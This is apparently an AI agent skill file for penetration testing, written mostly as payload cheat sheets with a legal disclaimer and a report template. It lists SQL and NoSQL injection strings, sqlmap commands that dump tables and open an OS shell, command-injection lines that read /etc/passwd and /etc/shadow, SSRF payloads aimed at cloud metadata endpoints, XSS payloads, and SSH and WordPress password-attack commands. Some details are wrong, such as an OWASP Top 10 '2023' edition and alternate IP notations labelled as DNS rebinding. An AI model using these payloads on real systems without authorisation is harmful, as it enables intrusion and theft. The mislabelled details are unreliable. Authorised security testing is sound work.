---
name: pentesting
description: |
  Penetration testing skill combining SQL injection, command injection, SSRF, HTML injection,
  SSH, and WordPress penetration testing. Use when performing security assessments.
---

# Penetration Testing

Comprehensive pentesting skill combining: SQL injection, command injection, SSRF, HTML injection, SSH, and specialized platform testing.

---

## Quick Reference

| Vulnerability | Use Section |
|--------------|-------------|
| SQL Injection | **SQL Injection** |
| Database enumeration | **SQLMap** |
| Command injection | **Command Injection** |
| SSRF | **SSRF Testing** |
| HTML injection | **HTML Injection** |
| SSH testing | **SSH Pentesting** |
| WordPress | **WordPress Testing** |
| Web3 | **Web3 Testing** |

---

## SQL Injection

### Types
1. **In-Band** - Data returned via same channel
2. **Blind** - No data returned, infer from behavior
3. **Time-Based** - Use delays to infer data
4. **Out-of-Band** - Data via alternative channel

### Testing Checklist
```bash
# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
```

### NoSQL Injection
```javascript
// MongoDB
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "function() { return true; }"}
```

### SQLMap
```bash
# Basic scan
sqlmap -u "http://target.com/?id=1"

# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"

# Cookie injection
sqlmap -u "http://target.com/" --cookie="PHPSESSID=abc123"

# Enumerate databases
sqlmap -u "http://target.com/?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/?id=1" -D database_name --tables

# Dump data
sqlmap -u "http://target.com/?id=1" -D database_name -T users --dump

# Shell access
sqlmap -u "http://target.com/?id=1" --os-shell
```

### SQLMap Options
| Option | Description |
|--------|-------------|
| `--dbs` | List databases |
| `-D` | Specify database |
| `--tables` | List tables |
| `-T` | Specify table |
| `--dump` | Extract data |
| `--os-shell` | OS shell access |
| `--batch` | Non-interactive |
| `--risk=3` | High risk tests |

---

## Command Injection

### Testing Checklist
```bash
# Common payloads
; ls
| ls
& ls
&& ls
|| ls
`ls`
$(ls)
| cat /etc/passwd
; cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)

# Blind command injection
& sleep 5 &
| sleep 5 &
; sleep 5 &
```

### Filter Bypass
```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}

# No quotes
cat /etc/passwd
cat /etc/shadow

# Encoding
echo "Y2F0ICAvZXRjL3Bhc3N3ZA==" | base64 -d
```

---

## SSRF (Server-Side Request Forgery)

### Testing Checklist
```bash
# Localhost
http://127.0.0.1
http://localhost
http://[::1]

# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/

# Internal services
http://192.168.1.1
http://10.0.0.1
http://internal/

# File access
file:///etc/passwd
dict://localhost:11211/stats
sftp://localhost/
```

### SSRF Bypasses
```bash
# DNS rebinding
http://127.1.1.1
http://0x7f000001

# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31

# IP shortening
http://2130706433
http://017700000001

# IPv6
http://[0:0:0:0:0:ffff:127.0.0.1]
```

---

## HTML Injection

### Testing Checklist
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<marquee onstart=alert(1)>
```

### XSS Contexts
| Context | Payload |
|---------|---------|
| HTML body | `<script>alert(1)</script>` |
| Attribute | `" onmouseover=alert(1) x="` |
| URL | `javascript:alert(1)` |
| CSS | `style="x:expression(alert(1))"` |
| JavaScript | `';alert(1);//` |

---

## SSH Penetration Testing

### Testing Checklist
```bash
# SSH version detection
ssh -s target.com

# Banner grabbing
nc target.com 22

# Authentication testing
hydra -l root -p password ssh://target.com
medusa -h target.com -u root -P passwords.txt -M ssh

# Key authentication
ssh -i key.pem root@target.com

# Weak keys check
./ssh-audit.py target.com
```

### SSH Audit
```bash
# Check SSH config
sshd -T

# Common issues
# - Weak ciphers
# - Old protocol
# - Root login allowed
# - Empty passwords
# - Default keys
```

---

## WordPress Penetration Testing

### Enumeration
```bash
# Version detection
curl -s target.com/ | grep generator

# User enumeration
curl -s "target.com/wp-json/wp/v2/users/"

# Plugins
curl -s "target.com/wp-content/plugins/"
wpscan --url target.com --enumerate p

# Themes
wpscan --url target.com --enumerate t

# Users
wpscan --url target.com --enumerate u
```

### Common Vulnerabilities
```bash
# Plugin vulnerabilities
wpscan --url target.com --enumerate vp

# Password attacks
wpscan --url target.com --passwords wordlist.txt

# XMLRPC
curl -X POST "http://target.com/xmlrpc.php" -d "<?xml version='1.0'?><methodCall><methodName>wp.getUsers</methodName></methodCall>"

# Debug mode
curl -s "target.com/wp-config.php" | grep WP_DEBUG
```

### WPScan
```bash
# Full scan
wpscan --url target.com --enumerate all --api-token YOUR_TOKEN

# Vulnerability scan
wpscan --url target.com --enumerate vpt

# Password attack
wpscan --url target.com -P passwords.txt -U admin
```

---

## Web3 Testing

### Smart Contract Testing
```bash
# Slither - static analysis
slither contract.sol

# Mythril - security analysis
myth analyze contract.sol

# Echidna - fuzzing
echidna contract.sol

# Foundry - testing framework
forge test
```

### Common Vulnerabilities
| Vulnerability | Description |
|--------------|-------------|
| Reentrancy | Withdraw before state update |
| Integer overflow | Math errors in calculations |
| Access control | Missing modifiers |
| Front-running | Transaction ordering |
| Timestamp dependence | Block timestamp manipulation |

---

## OWASP Top 10 (2023)

| A01 | Broken Access Control |
| A02 | Cryptographic Failures |
| A03 | Injection |
| A04 | Insecure Design |
| A05 | Security Misconfiguration |
| A06 | Vulnerable Components |
| A07 | Auth Failures |
| A08 | Data Integrity Failures |
| A09 | Logging Failures |
| A10 | SSRF |

---

## Report Template

### Finding Details
```markdown
## [Finding Title]

**Severity:** Critical / High / Medium / Low / Informational

**CVSS Score:** [0.0-10.0]

**Description:**
[Detailed description of the vulnerability]

**Impact:**
[How this could be exploited and its business impact]

**Steps to Reproduce:**
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Proof of Concept:**
[Code snippets, screenshots, etc.]

**Remediation:**
[How to fix the vulnerability]

**References:**
- [Link 1]
- [Link 2]
```

---

## Legal Disclaimer

> **WARNING:** Only test systems you have explicit written permission to test. Unauthorized penetration testing is illegal.

---

## Best Practices

1. **Get Written Permission** - Before any testing
2. **Define Scope** - Clear boundaries
3. **Document Everything** - Keep detailed notes
4. **Don't Exploit** - Demonstrate impact, don't destroy
5. **Report Responsibly** - Follow responsible disclosure
6. **Prioritize** - Focus on high-impact findings